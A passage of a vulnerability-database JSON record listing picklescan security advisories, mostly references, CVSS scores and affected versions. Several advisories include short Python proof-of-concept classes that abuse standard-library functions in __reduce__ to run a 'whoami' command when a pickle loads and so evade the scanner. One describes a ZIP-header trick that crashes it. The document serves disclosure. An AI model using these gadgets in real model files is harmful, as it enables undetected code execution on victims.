"https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/advisories/GHSA-x843-g5mx-g377", "reference_id": "GHSA-x843-g5mx-g377", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x843-g5mx-g377" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-x843-g5mx-g377", "reference_id": "GHSA-x843-g5mx-g377", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-x843-g5mx-g377" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-x843-g5mx-g377" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-46rw-3mfv-67ad" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360628?format=api", "vulnerability_id": "VCID-4nda-nuz6-gqgm", "summary": "Picklescan is missing detection when calling built-in python idlelib.run.Executive.runcode\n### Summary\n\nUsing idlelib.run.Executive.runcode function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.run.Executive.runcode function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nfrom idlelib.run import Executive\nfrom types import SimpleNamespace\n\nclass EvilIdlelibRunExecutiveRuncode:\n def __reduce__(self):\n payload = \"__import__('os').system('whoami')\"\n fake_self = SimpleNamespace(locals={})\n return Executive.runcode, (fake_self, payload)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m869-42cg-3xwr", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m869-42cg-3xwr" }, { "reference_url": "https://github.com/advisories/GHSA-m869-42cg-3xwr", "reference_id": "GHSA-m869-42cg-3xwr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m869-42cg-3xwr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-m869-42cg-3xwr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4nda-nuz6-gqgm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360722?format=api", "vulnerability_id": "VCID-4u6x-5jg3-jbfx", "summary": "Duplicate Advisory: Zip Exploit Crashes Picklescan But Not PyTorch\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-7q5r-7gvp-wc82. This link is maintained to preserve external references.\n\n## Original Description\npicklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in the ZIP header while keeping the original filename in the directory listing, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch's more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1944", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1944" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82", "reference_id": "GHSA-7q5r-7gvp-wc82", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82" }, { "reference_url": "https://github.com/advisories/GHSA-w6mr-mj53-x258", "reference_id": "GHSA-w6mr-mj53-x258", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w6mr-mj53-x258" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87037?format=api", "purl": "pkg:pypi/picklescan@0.0.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cce-4mst-r7h4" }, { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-d4vv-a8kx-5kdc" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-rqap-hdeb-1ffb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.23" } ], "aliases": [ "GHSA-w6mr-mj53-x258" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4u6x-5jg3-jbfx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360639?format=api", "vulnerability_id": "VCID-555e-6p5m-xbbc", "summary": "Picklescan has a missing detection when calling built-in python code.InteractiveInterpreter\n### Summary\n\nUsing code.InteractiveInterpreter.runcode, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to code.InteractiveInterpreter.runcode function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilCodeRuncode:\n def __reduce__(self):\n from code import InteractiveInterpreter\n # InteractiveInterpreter().runcode(cmd) -> exec(cmd)\n return InteractiveInterpreter().runcode, (\"__import__('os').system('whoami')\",)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-cj3c-v495-4xqh", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-cj3c-v495-4xqh" }, { "reference_url": "https://github.com/advisories/GHSA-cj3c-v495-4xqh", "reference_id": "GHSA-cj3c-v495-4xqh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cj3c-v495-4xqh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-cj3c-v495-4xqh" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-555e-6p5m-xbbc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360677?format=api", "vulnerability_id": "VCID-6723-ghp7-yqd1", "summary": "Picklescan has a missing detection when calling built-in python library idlelib.calltip.get_entity\n### Summary\n\nUsing idlelib.calltip.get_entity function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.calltip.get_entity function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nfrom idlelib.calltip import get_entity\n\nclass EvilCalltipGetEntity:\n def __reduce__(self):\n # get_entity(expression) -> eval(expression)\n return get_entity, (\"__import__('os').system('whoami')\",)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9xph-j2h6-g47v", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9xph-j2h6-g47v" }, { "reference_url": "https://github.com/advisories/GHSA-9xph-j2h6-g47v", "reference_id": "GHSA-9xph-j2h6-g47v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9xph-j2h6-g47v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-9xph-j2h6-g47v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6723-ghp7-yqd1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360638?format=api", "vulnerability_id": "VCID-6pqf-4qcr-ckac", "summary": "Picklescan is missing detection when calling built-in python doctest.debug_script\n### Summary\n\nUsing doctest.debug_script function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to doctest.debug_script function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nfrom doctest import debug_script\n\nclass EvilDoctestDebugScript:\n def __reduce__(self):\n # debug_script(src, pm=True) -> exec(src, ...)\n return debug_script, (\"__import__('os').system('whoami')\", True)\n\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-fqq6-7vqf-w3fg", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-fqq6-7vqf-w3fg" }, { "reference_url": "https://github.com/advisories/GHSA-fqq6-7vqf-w3fg", "reference_id": "GHSA-fqq6-7vqf-w3fg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fqq6-7vqf-w3fg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-fqq6-7vqf-w3fg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6pqf-4qcr-ckac" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360659?format=api", "vulnerability_id": "VCID-6smr-kf6r-53gc", "summary": "Picklescan has a missing detection when calling built-in python idlelib.autocomplete.AutoComplete.get_entity\n### Summary\n\nUsing idlelib.autocomplete.AutoComplete.get_entity, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.autocomplete.AutoComplete.get_entity function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilIdlelibAutocompleteGetEntity:\n def __reduce__(self):\n from idlelib.autocomplete import AutoComplete\n return AutoComplete().get_entity, (\"__import__('os').system('whoami')\",)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6w4w-5w54-rjvr", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 